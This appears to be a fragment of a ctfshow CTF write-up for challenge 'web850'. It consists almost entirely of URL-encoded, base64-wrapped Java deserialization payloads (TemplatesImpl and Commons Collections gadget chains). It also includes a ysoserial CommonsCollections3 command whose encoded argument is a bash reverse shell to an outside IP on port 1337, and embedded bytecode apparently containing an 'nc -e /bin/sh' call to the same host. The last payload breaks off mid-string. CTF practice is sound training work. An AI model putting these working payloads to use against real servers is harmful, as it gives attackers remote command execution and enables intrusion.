%57%30%78%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%51%32%78%68%63%33%4d%37%65%48%42%31%0a%63%67%41%54%57%30%78%71%59%58%5a%68%4c%6d%78%68%62%6d%63%75%54%32%4a%71%5a%57%4e%30%4f%35%44%4f%57%4a%38%51%63%79%6c%73%41%67%41%41%65%48%41%41%41%41%41%41%64%41%41%4f%62%6d%56%33%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%4a%31%0a%63%67%41%53%57%30%78%71%59%58%5a%68%4c%6d%78%68%62%6d%63%75%51%32%78%68%63%33%4d%37%71%78%62%58%72%73%76%4e%57%70%6b%43%41%41%42%34%63%41%41%41%41%41%42%33%42%41%41%41%41%41%4e%7a%63%67%41%36%59%32%39%74%4c%6e%4e%31%62%69%35%76%0a%63%6d%63%75%59%58%42%68%59%32%68%6c%4c%6e%68%68%62%47%46%75%4c%6d%6c%75%64%47%56%79%62%6d%46%73%4c%6e%68%7a%62%48%52%6a%4c%6e%52%79%59%58%67%75%56%47%56%74%63%47%78%68%64%47%56%7a%53%57%31%77%62%41%6c%58%54%38%46%75%72%4b%73%7a%0a%41%77%41%47%53%51%41%4e%58%32%6c%75%5a%47%56%75%64%45%35%31%62%57%4a%6c%63%6b%6b%41%44%6c%39%30%63%6d%46%75%63%32%78%6c%64%45%6c%75%5a%47%56%34%57%77%41%4b%58%32%4a%35%64%47%56%6a%62%32%52%6c%63%33%51%41%41%31%74%62%51%6c%73%41%0a%42%6c%39%6a%62%47%46%7a%63%33%45%41%66%67%41%4c%54%41%41%46%58%32%35%68%62%57%56%78%41%48%34%41%43%6b%77%41%45%56%39%76%64%58%52%77%64%58%52%51%63%6d%39%77%5a%58%4a%30%61%57%56%7a%64%41%41%57%54%47%70%68%64%6d%45%76%64%58%52%70%0a%62%43%39%51%63%6d%39%77%5a%58%4a%30%61%57%56%7a%4f%33%68%77%41%41%41%41%41%50%2f%2f%2f%2f%39%31%63%67%41%44%57%31%74%43%53%2f%30%5a%46%57%64%6e%32%7a%63%43%41%41%42%34%63%41%41%41%41%41%4a%31%63%67%41%43%57%30%4b%73%38%78%66%34%0a%42%67%68%55%34%41%49%41%41%48%68%77%41%41%41%47%75%73%72%2b%75%72%34%41%41%41%41%79%41%44%6b%4b%41%41%4d%41%49%67%63%41%4e%77%63%41%4a%51%63%41%4a%67%45%41%45%48%4e%6c%63%6d%6c%68%62%46%5a%6c%63%6e%4e%70%62%32%35%56%53%55%51%42%0a%41%41%46%4b%41%51%41%4e%51%32%39%75%63%33%52%68%62%6e%52%57%59%57%78%31%5a%51%57%74%49%4a%50%7a%6b%64%33%76%50%67%45%41%42%6a%78%70%62%6d%6c%30%50%67%45%41%41%79%67%70%56%67%45%41%42%45%4e%76%5a%47%55%42%41%41%39%4d%61%57%35%6c%0a%54%6e%56%74%59%6d%56%79%56%47%46%69%62%47%55%42%41%42%4a%4d%62%3
2%4e%68%62%46%5a%68%63%6d%6c%68%59%6d%78%6c%56%47%46%69%62%47%55%42%41%41%52%30%61%47%6c%7a%41%51%41%54%55%33%52%31%59%6c%52%79%59%57%35%7a%62%47%56%30%55%47%46%35%0a%62%47%39%68%5a%41%45%41%44%45%6c%75%62%6d%56%79%51%32%78%68%63%33%4e%6c%63%77%45%41%4e%55%78%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%5a%58%52%7a%4a%46%4e%30%0a%64%57%4a%55%63%6d%46%75%63%32%78%6c%64%46%42%68%65%57%78%76%59%57%51%37%41%51%41%4a%64%48%4a%68%62%6e%4e%6d%62%33%4a%74%41%51%42%79%4b%45%78%6a%62%32%30%76%63%33%56%75%4c%32%39%79%5a%79%39%68%63%47%46%6a%61%47%55%76%65%47%46%73%0a%59%57%34%76%61%57%35%30%5a%58%4a%75%59%57%77%76%65%48%4e%73%64%47%4d%76%52%45%39%4e%4f%31%74%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%0a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%79%6c%57%41%51%41%49%5a%47%39%6a%64%57%31%6c%62%6e%51%42%41%43%31%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%0a%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%68%62%47%46%75%4c%32%6c%75%64%47%56%79%62%6d%46%73%4c%33%68%7a%62%48%52%6a%4c%30%52%50%54%54%73%42%41%41%68%6f%59%57%35%6b%62%47%56%79%63%77%45%41%51%6c%74%4d%59%32%39%74%4c%33%4e%31%0a%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%0a%4f%77%45%41%43%6b%56%34%59%32%56%77%64%47%6c%76%62%6e%4d%48%41%43%63%42%41%4b%59%6f%54%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%59%57%78%68%62%69%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%34%0a%63%32%78%30%59%79%39%45%54%30%30%37%54%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%62%57%77%76%61%57%35%30%5a%58%4a%75%59%57%77%76%5a%48%52%74%4c%30%52%55%54%55%46%34%61%58%4e%4a%
64%47%56%79%0a%59%58%52%76%63%6a%74%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%0a%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%79%6c%57%41%51%41%49%61%58%52%6c%63%6d%46%30%62%33%49%42%41%44%56%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%0a%63%6d%35%68%62%43%39%6b%64%47%30%76%52%46%52%4e%51%58%68%70%63%30%6c%30%5a%58%4a%68%64%47%39%79%4f%77%45%41%42%32%68%68%62%6d%52%73%5a%58%49%42%41%45%46%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%0a%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%77%45%41%43%6c%4e%76%64%58%4a%6a%5a%55%5a%70%0a%62%47%55%42%41%41%78%48%59%57%52%6e%5a%58%52%7a%4c%6d%70%68%64%6d%45%4d%41%41%6f%41%43%77%63%41%4b%41%45%41%4d%33%6c%7a%62%33%4e%6c%63%6d%6c%68%62%43%39%77%59%58%6c%73%62%32%46%6b%63%79%39%31%64%47%6c%73%4c%30%64%68%5a%47%64%6c%0a%64%48%4d%6b%55%33%52%31%59%6c%52%79%59%57%35%7a%62%47%56%30%55%47%46%35%62%47%39%68%5a%41%45%41%51%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%59%57%78%68%62%69%39%70%62%6e%52%6c%63%6d%35%68%0a%62%43%39%34%63%32%78%30%59%79%39%79%64%57%35%30%61%57%31%6c%4c%30%46%69%63%33%52%79%59%57%4e%30%56%48%4a%68%62%6e%4e%73%5a%58%51%42%41%42%52%71%59%58%5a%68%4c%32%6c%76%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%57%4a%73%5a%51%45%41%0a%4f%57%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%59%57%78%68%62%69%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%34%63%32%78%30%59%79%39%55%63%6d%46%75%63%32%78%6c%64%45%56%34%59%32%56%77%64%47%6c%76%0a%62%67%45%41%48%33%6c%7a%62%33%4e%6c%63%6d%6c%68%62%43%39%77%59%58%6c%73%62%32%46%6b%63%79%39%31%64%47%6c%73%4c%30%64%68%5a%47%64%6c%64%48
%4d%42%41%41%67%38%59%32%78%70%62%6d%6c%30%50%67%45%41%45%57%70%68%64%6d%45%76%62%47%46%75%0a%5a%79%39%53%64%57%35%30%61%57%31%6c%42%77%41%71%41%51%41%4b%5a%32%56%30%55%6e%56%75%64%47%6c%74%5a%51%45%41%46%53%67%70%54%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%53%64%57%35%30%61%57%31%6c%4f%77%77%41%4c%41%41%74%43%67%41%72%0a%41%43%34%42%41%43%4a%75%59%79%41%78%4d%6a%51%75%4d%6a%49%79%4c%6a%45%7a%4e%69%34%7a%4d%79%41%78%4d%7a%4d%33%49%43%31%6c%49%43%39%69%61%57%34%76%63%32%67%67%43%41%41%77%41%51%41%45%5a%58%68%6c%59%77%45%41%4a%79%68%4d%61%6d%46%32%0a%59%53%39%73%59%57%35%6e%4c%31%4e%30%63%6d%6c%75%5a%7a%73%70%54%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%51%63%6d%39%6a%5a%58%4e%7a%4f%77%77%41%4d%67%41%7a%43%67%41%72%41%44%51%42%41%41%31%54%64%47%46%6a%61%30%31%68%63%46%52%68%0a%59%6d%78%6c%41%51%41%66%65%58%4e%76%63%32%56%79%61%57%46%73%4c%31%42%33%62%6d%56%79%4d%54%45%30%4e%7a%51%79%4d%44%45%35%4d%54%45%78%4d%54%41%35%4e%41%45%41%49%55%78%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%55%48%64%75%5a%58%49%78%0a%4d%54%51%33%4e%44%49%77%4d%54%6b%78%4d%54%45%78%4d%44%6b%30%4f%77%41%68%41%41%49%41%41%77%41%42%41%41%51%41%41%51%41%61%41%41%55%41%42%67%41%42%41%41%63%41%41%41%41%43%41%41%67%41%42%41%41%42%41%41%6f%41%43%77%41%42%41%41%77%41%0a%41%41%41%76%41%41%45%41%41%51%41%41%41%41%55%71%74%77%41%42%73%51%41%41%41%41%49%41%44%51%41%41%41%41%59%41%41%51%41%41%41%43%38%41%44%67%41%41%41%41%77%41%41%51%41%41%41%41%55%41%44%77%41%34%41%41%41%41%41%51%41%54%41%42%51%41%0a%41%67%41%4d%41%41%41%41%50%77%41%41%41%41%4d%41%41%41%41%42%73%51%41%41%41%41%49%41%44%51%41%41%41%41%59%41%41%51%41%41%41%44%51%41%44%67%41%41%41%43%41%41%41%77%41%41%41%41%45%41%44%77%41%34%41%41%41%41%41%41%41%42%41%42%55%41%0a%46%67%41%42%41%41%41%41%41%51%41%58%41%42%67%41%41%67%41%5a%41%41%41%41%42%41%41%42%41%42%6f%41%41%51%41%54%41%42%73%41%41%67%41%4d%41%41%41%41%53%51%41%41%41%41%51%41%41%41%41%42%73%51%41%41%41%41%49%41%44%51%41%41%41%41%59%41%0a%41%51%41%41%41%44%67%41%44%67%41%41%41%43%6f%41%42%41%41%4
1%41%41%45%41%44%77%41%34%41%41%41%41%41%41%41%42%41%42%55%41%46%67%41%42%41%41%41%41%41%51%41%63%41%42%30%41%41%67%41%41%41%41%45%41%48%67%41%66%41%41%4d%41%47%51%41%41%0a%41%41%51%41%41%51%41%61%41%41%67%41%4b%51%41%4c%41%41%45%41%44%41%41%41%41%43%51%41%41%77%41%43%41%41%41%41%44%36%63%41%41%77%46%4d%75%41%41%76%45%6a%47%32%41%44%56%58%73%51%41%41%41%41%45%41%4e%67%41%41%41%41%4d%41%41%51%4d%41%0a%41%67%41%67%41%41%41%41%41%67%41%68%41%42%45%41%41%41%41%4b%41%41%45%41%41%67%41%6a%41%42%41%41%43%58%56%78%41%48%34%41%47%41%41%41%41%64%54%4b%2f%72%71%2b%41%41%41%41%4d%67%41%62%43%67%41%44%41%42%55%48%41%42%63%48%41%42%67%48%0a%41%42%6b%42%41%42%42%7a%5a%58%4a%70%59%57%78%57%5a%58%4a%7a%61%57%39%75%56%55%6c%45%41%51%41%42%53%67%45%41%44%55%4e%76%62%6e%4e%30%59%57%35%30%56%6d%46%73%64%57%55%46%63%65%5a%70%37%6a%78%74%52%78%67%42%41%41%59%38%61%57%35%70%0a%64%44%34%42%41%41%4d%6f%4b%56%59%42%41%41%52%44%62%32%52%6c%41%51%41%50%54%47%6c%75%5a%55%35%31%62%57%4a%6c%63%6c%52%68%59%6d%78%6c%41%51%41%53%54%47%39%6a%59%57%78%57%59%58%4a%70%59%57%4a%73%5a%56%52%68%59%6d%78%6c%41%51%41%45%0a%64%47%68%70%63%77%45%41%41%30%5a%76%62%77%45%41%44%45%6c%75%62%6d%56%79%51%32%78%68%63%33%4e%6c%63%77%45%41%4a%55%78%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%0a%5a%58%52%7a%4a%45%5a%76%62%7a%73%42%41%41%70%54%62%33%56%79%59%32%56%47%61%57%78%6c%41%51%41%4d%52%32%46%6b%5a%32%56%30%63%79%35%71%59%58%5a%68%44%41%41%4b%41%41%73%48%41%42%6f%42%41%43%4e%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%0a%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%5a%58%52%7a%4a%45%5a%76%62%77%45%41%45%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%50%59%6d%70%6c%59%33%51%42%41%42%52%71%59%58%5a%68%4c%32%6c%76%4c%31%4e%6c%0a%63%6d%6c%68%62%47%6c%36%59%57%4a%73%5a%51%45%41%48%33%6c%7a%62%33%4e%6c%63%6d%6c%68%62%43%39%77%59%58%6c%73%62%32%46%6b%63%79%39%31%64%47%6c%73%4c%30%64%68%5a%47%64%6c%64%48%4d%41%49%51%41%43%41%41%4d%41%41%51%
41%45%41%41%45%41%0a%47%67%41%46%41%41%59%41%41%51%41%48%41%41%41%41%41%67%41%49%41%41%45%41%41%51%41%4b%41%41%73%41%41%51%41%4d%41%41%41%41%4c%77%41%42%41%41%45%41%41%41%41%46%4b%72%63%41%41%62%45%41%41%41%41%43%41%41%30%41%41%41%41%47%41%41%45%41%0a%41%41%41%38%41%41%34%41%41%41%41%4d%41%41%45%41%41%41%41%46%41%41%38%41%45%67%41%41%41%41%49%41%45%77%41%41%41%41%49%41%46%41%41%52%41%41%41%41%43%67%41%42%41%41%49%41%46%67%41%51%41%41%6c%77%64%41%41%45%55%48%64%75%63%6e%42%33%0a%41%51%42%34%63%33%49%41%45%57%70%68%64%6d%45%75%62%47%46%75%5a%79%35%4a%62%6e%52%6c%5a%32%56%79%45%75%4b%67%70%50%65%42%68%7a%67%43%41%41%46%4a%41%41%56%32%59%57%78%31%5a%58%68%79%41%42%42%71%59%58%5a%68%4c%6d%78%68%62%6d%63%75%0a%54%6e%56%74%59%6d%56%79%68%71%79%56%48%51%75%55%34%49%73%43%41%41%42%34%63%41%41%41%41%41%46%34%0a

web850

java -jar ysoserial.jar CommonsCollections3 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjEzNi4zMy8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}"|base64

最终payload:

ctfshow=%72%4f%30%41%42%58%4e%79%41%44%4a%7a%64%57%34%75%63%6d%56%6d%62%47%56%6a%64%43%35%68%62%6d%35%76%64%47%46%30%61%57%39%75%4c%6b%46%75%62%6d%39%30%59%58%52%70%62%32%35%4a%62%6e%5a%76%59%32%46%30%61%57%39%75%53%47%46%75%5a%47%78%6c%63%6c%58%4b%39%51%38%56%79%33%36%6c%41%67%41%43%54%41%41%4d%62%57%56%74%59%6d%56%79%56%6d%46%73%64%57%56%7a%64%41%41%50%54%47%70%68%64%6d%45%76%64%58%52%70%62%43%39%4e%59%58%41%37%54%41%41%45%64%48%6c%77%5a%58%51%41%45%55%78%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%51%32%78%68%63%33%4d%37%65%48%42%7a%66%51%41%41%41%41%45%41%44%57%70%68%64%6d%45%75%64%58%52%70%62%43%35%4e%59%58%42%34%63%67%41%58%61%6d%46%32%59%53%35%73%59%57%35%6e%4c%6e%4a%6c%5a%6d%78%6c%59%33%51%75%55%48%4a%76%65%48%6e%68%4a%39%6f%67%7a%42%42%44%79%77%49%41%41%55%77%41%41%57%68%30%41%43%56%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%33%4a%6c%5a%6d%78%6c%59%33%51%76%53%57%35%32%62%32%4e%68%64%47%6c%76%62%6b%68%68%62%6d%52%73%5a%58%49%37%65%48%42%7a%63%51%42%2b%41%41%42%7a%63%67%41%71%62%33%4a%6e%4c%6d%46%77%59%57%4e%6f%5a%53%35%6a%62%32%31%74%62%32%35%7a%4c%6d%4e%76%62%47%78%6c%59%33%52%70%62%32%35%7a%4c%6d%31%68%63%43%35%4d%59%58%70%35%54%57%46%77%62%75%57%55%67%70%35%35%45%4a%51%44%41%41%46%4d%41%41%64%6d%59%57%4e%30%62%33%4a%35%64%41%41%73%54%47%39%79%5a%79%39%68%63%47%46%6a%61%47%55%76%59%32%39%74%62%57%39%75%63%79%39%6a%62%32%78%73%5a%57%4e%30%61%57%39%75%63%79%39%55%63%6d%46%75%63%32%5a%76%63%6d%31%6c%63%6a%74%34%63%48%4e%79%41%44%70%76%63%6d%63%75%59%58%42%68%59%32%68%6c%4c%6d%4e%76%62%57%31%76%62%6e%4d%75%59%32%39%73%62%47%56%6a%64%47%6c%76%62%6e%4d%75%5a%6e%56%75%59%33%52%76%63%6e%4d%75%51%32%68%68%61%57%35%6c%5a%46%52%79%59%57%35%7a%5a%6d%39%79%62%57%56%79%4d%4d%65%58%37%43%68%36%6c%77%51%43%41%41%46%62%41%41%31%70%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%4a%7a%64%41%41%74%57%30%78%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%32%4e%76%62%57%31%76%62%6e%4d%76%59%32%39%73%62%47%56%6a%64%47%6c%76%62%6e%4d%76%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%49%37%65%48%42%31
%63%67%41%74%57%30%78%76%63%6d%63%75%59%58%42%68%59%32%68%6c%4c%6d%4e%76%62%57%31%76%62%6e%4d%75%59%32%39%73%62%47%56%6a%64%47%6c%76%62%6e%4d%75%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%49%37%76%56%59%71%38%64%67%30%47%4a%6b%43%41%41%42%34%63%41%41%41%41%41%4a%7a%63%67%41%37%62%33%4a%6e%4c%6d%46%77%59%57%4e%6f%5a%53%35%6a%62%32%31%74%62%32%35%7a%4c%6d%4e%76%62%47%78%6c%59%33%52%70%62%32%35%7a%4c%6d%5a%31%62%6d%4e%30%62%33%4a%7a%4c%6b%4e%76%62%6e%4e%30%59%57%35%30%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%4a%59%64%70%41%52%51%51%4b%78%6c%41%49%41%41%55%77%41%43%57%6c%44%62%32%35%7a%64%47%46%75%64%48%51%41%45%6b%78%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%54%32%4a%71%5a%57%4e%30%4f%33%68%77%64%6e%49%41%4e%32%4e%76%62%53%35%7a%64%57%34%75%62%33%4a%6e%4c%6d%46%77%59%57%4e%6f%5a%53%35%34%59%57%78%68%62%69%35%70%62%6e%52%6c%63%6d%35%68%62%43%35%34%63%32%78%30%59%79%35%30%63%6d%46%34%4c%6c%52%79%51%56%68%47%61%57%78%30%5a%58%49%41%41%41%41%41%41%41%41%41%41%41%41%41%41%48%68%77%63%33%49%41%50%6d%39%79%5a%79%35%68%63%47%46%6a%61%47%55%75%59%32%39%74%62%57%39%75%63%79%35%6a%62%32%78%73%5a%57%4e%30%61%57%39%75%63%79%35%6d%64%57%35%6a%64%47%39%79%63%79%35%4a%62%6e%4e%30%59%57%35%30%61%57%46%30%5a%56%52%79%59%57%35%7a%5a%6d%39%79%62%57%56%79%4e%49%76%30%66%36%53%47%30%44%73%43%41%41%4a%62%41%41%56%70%51%58%4a%6e%63%33%51%41%45%31%74%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%30%39%69%61%6d%56%6a%64%44%74%62%41%41%74%70%55%47%46%79%59%57%31%55%65%58%42%6c%63%33%51%41%45%6c%74%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%30%4e%73%59%58%4e%7a%4f%33%68%77%64%58%49%41%45%31%74%4d%61%6d%46%32%59%53%35%73%59%57%35%6e%4c%6b%39%69%61%6d%56%6a%64%44%75%51%7a%6c%69%66%45%48%4d%70%62%41%49%41%41%48%68%77%41%41%41%41%41%58%4e%79%41%44%70%6a%62%32%30%75%63%33%56%75%4c%6d%39%79%5a%79%35%68%63%47%46%6a%61%47%55%75%65%47%46%73%59%57%34%75%61%57%35%30%5a%58%4a%75%59%57%77%75%65%48%4e%73%64%47%4d%75%64%48%4a%68%65%43%35%55%5a%57%31%77%62%47%46%30%5a%58%4e%4a%62%58%42%73%43%56%64%50%77%57%36%73%71%7a%4
d%44%41%41%5a%4a%41%41%31%66%61%57%35%6b%5a%57%35%30%54%6e%56%74%59%6d%56%79%53%51%41%4f%58%33%52%79%59%57%35%7a%62%47%56%30%53%57%35%6b%5a%58%68%62%41%41%70%66%59%6e%6c%30%5a%57%4e%76%5a%47%56%7a%64%41%41%44%57%31%74%43%57%77%41%47%58%32%4e%73%59%58%4e%7a%63%51%42%2b%41%42%68%4d%41%41%56%66%62%6d%46%74%5a%58%51%41%45%6b%78%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%55%33%52%79%61%57%35%6e%4f%30%77%41%45%56%39%76%64%58%52%77%64%58%52%51%63%6d%39%77%5a%58%4a%30%61%57%56%7a%64%41%41%57%54%47%70%68%64%6d%45%76%64%58%52%70%62%43%39%51%63%6d%39%77%5a%58%4a%30%61%57%56%7a%4f%33%68%77%41%41%41%41%41%50%2f%2f%2f%2f%39%31%63%67%41%44%57%31%74%43%53%2f%30%5a%46%57%64%6e%32%7a%63%43%41%41%42%34%63%41%41%41%41%41%4a%31%63%67%41%43%57%30%4b%73%38%78%66%34%42%67%68%55%34%41%49%41%41%48%68%77%41%41%41%47%2b%63%72%2b%75%72%34%41%41%41%41%79%41%44%6b%4b%41%41%4d%41%49%67%63%41%4e%77%63%41%4a%51%63%41%4a%67%45%41%45%48%4e%6c%63%6d%6c%68%62%46%5a%6c%63%6e%4e%70%62%32%35%56%53%55%51%42%41%41%46%4b%41%51%41%4e%51%32%39%75%63%33%52%68%62%6e%52%57%59%57%78%31%5a%51%57%74%49%4a%50%7a%6b%64%33%76%50%67%45%41%42%6a%78%70%62%6d%6c%30%50%67%45%41%41%79%67%70%56%67%45%41%42%45%4e%76%5a%47%55%42%41%41%39%4d%61%57%35%6c%54%6e%56%74%59%6d%56%79%56%47%46%69%62%47%55%42%41%42%4a%4d%62%32%4e%68%62%46%5a%68%63%6d%6c%68%59%6d%78%6c%56%47%46%69%62%47%55%42%41%41%52%30%61%47%6c%7a%41%51%41%54%55%33%52%31%59%6c%52%79%59%57%35%7a%62%47%56%30%55%47%46%35%62%47%39%68%5a%41%45%41%44%45%6c%75%62%6d%56%79%51%32%78%68%63%33%4e%6c%63%77%45%41%4e%55%78%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%5a%58%52%7a%4a%46%4e%30%64%57%4a%55%63%6d%46%75%63%32%78%6c%64%46%42%68%65%57%78%76%59%57%51%37%41%51%41%4a%64%48%4a%68%62%6e%4e%6d%62%33%4a%74%41%51%42%79%4b%45%78%6a%62%32%30%76%63%33%56%75%4c%32%39%79%5a%79%39%68%63%47%46%6a%61%47%55%76%65%47%46%73%59%57%34%76%61%57%35%30%5a%58%4a%75%59%57%77%76%65%48%4e%73%64%47%4d%76%52%45%39%4e%4f%31%74%4d%59%32%39%74%4c%
33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%79%6c%57%41%51%41%49%5a%47%39%6a%64%57%31%6c%62%6e%51%42%41%43%31%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%68%62%47%46%75%4c%32%6c%75%64%47%56%79%62%6d%46%73%4c%33%68%7a%62%48%52%6a%4c%30%52%50%54%54%73%42%41%41%68%6f%59%57%35%6b%62%47%56%79%63%77%45%41%51%6c%74%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%77%45%41%43%6b%56%34%59%32%56%77%64%47%6c%76%62%6e%4d%48%41%43%63%42%41%4b%59%6f%54%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%59%57%78%68%62%69%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%34%63%32%78%30%59%79%39%45%54%30%30%37%54%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%62%57%77%76%61%57%35%30%5a%58%4a%75%59%57%77%76%5a%48%52%74%4c%30%52%55%54%55%46%34%61%58%4e%4a%64%47%56%79%59%58%52%76%63%6a%74%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%79%6c%57%41%51%41%49%61%58%52%6c%63%6d%46%30%62%33%49%42%41%44%56%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%6b%64%47%30%76%52%46%52%4e%51%58%68%70%63%30%6c%30%5a%58%4a%68%64%47%39%79%4f%77%45%41%42%32%68%68%62%6d%52%73%5a%58%49%42%41%45%46%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a
%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%77%45%41%43%6c%4e%76%64%58%4a%6a%5a%55%5a%70%62%47%55%42%41%41%78%48%59%57%52%6e%5a%58%52%7a%4c%6d%70%68%64%6d%45%4d%41%41%6f%41%43%77%63%41%4b%41%45%41%4d%33%6c%7a%62%33%4e%6c%63%6d%6c%68%62%43%39%77%59%58%6c%73%62%32%46%6b%63%79%39%31%64%47%6c%73%4c%30%64%68%5a%47%64%6c%64%48%4d%6b%55%33%52%31%59%6c%52%79%59%57%35%7a%62%47%56%30%55%47%46%35%62%47%39%68%5a%41%45%41%51%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%59%57%78%68%62%69%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%34%63%32%78%30%59%79%39%79%64%57%35%30%61%57%31%6c%4c%30%46%69%63%33%52%79%59%57%4e%30%56%48%4a%68%62%6e%4e%73%5a%58%51%42%41%42%52%71%59%58%5a%68%4c%32%6c%76%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%57%4a%73%5a%51%45%41%4f%57%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%59%57%78%68%62%69%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%34%63%32%78%30%59%79%39%55%63%6d%46%75%63%32%78%6c%64%45%56%34%59%32%56%77%64%47%6c%76%62%67%45%41%48%33%6c%7a%62%33%4e%6c%63%6d%6c%68%62%43%39%77%59%58%6c%73%62%32%46%6b%63%79%39%31%64%47%6c%73%4c%30%64%68%5a%47%64%6c%64%48%4d%42%41%41%67%38%59%32%78%70%62%6d%6c%30%50%67%45%41%45%57%70%68%64%6d%45%76%62%47%46%75%5a%79%39%53%64%57%35%30%61%57%31%6c%42%77%41%71%41%51%41%4b%5a%32%56%30%55%6e%56%75%64%47%6c%74%5a%51%45%41%46%53%67%70%54%47%70%68%64